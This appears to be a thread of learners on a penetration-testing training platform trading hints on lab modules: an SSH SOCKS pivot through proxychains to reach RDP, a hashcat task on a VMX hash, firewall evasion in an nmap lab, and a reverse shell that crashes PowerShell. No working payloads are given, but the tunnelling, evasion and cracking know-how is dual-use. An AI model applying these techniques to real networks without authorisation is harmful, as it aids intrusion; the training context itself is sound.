That's because it shortens the message. You'll have to select the message field for it to fully display
Okay i will try
has anyone done pivoting module ? I am stuck on port forwarding second question where i need to rdp ? has anyone completed it ??
many have
I have followed all the steps doing ssh -D 9050 ubtunt@ip then adding socks4 127.0.0.1 9050 inside my proxychains4.conf file still when I look for rdp on that internal network it shows connection refused and showing filtered with nmap, saw some people having same issues on the forum, the solution they have shared ain't working as well, I have tried static port forwarding as well, banging my head on it for hours..
if everything is setup properly it should work
Exactly lol, tried it on the box as well, still facing the same issues, asked a friend who has done the module saying it should as everything looks fine but unfortunately its not working for me
if you think it's the environment you can reset it or try another region/server but it's probably something in your setup
I have tried it many times with the steps mentioned in the module , I have done it the way I have shared, can you please point out the mistake if you can find it cause i cant 😦
you can dm me
thanks!
somebody understands the VMX hash cracking task, in hashcat module? it says that the final password comes in format Inlane_, and is at least 10 chars, so I dont get if the string Inlane is a prefix or it means that the password is capitalized and has a special char as a suffix
Module: Network Enumeration with Nmap
Section: Firewall and IDS/IPS Evasion - Hard Lab
Can someone help me here? I have nearly tried everything, I found out another port except those 2 but still idk what I am missing. I know source port is my friend but still.
Once you find a non-default port: nc is your friend
can I dm you?
No
Heyy, I am having a problem while going through reverse shell
port 137 didnt work for me
powershell is crashing whenever I am putting my revshell script in powershell
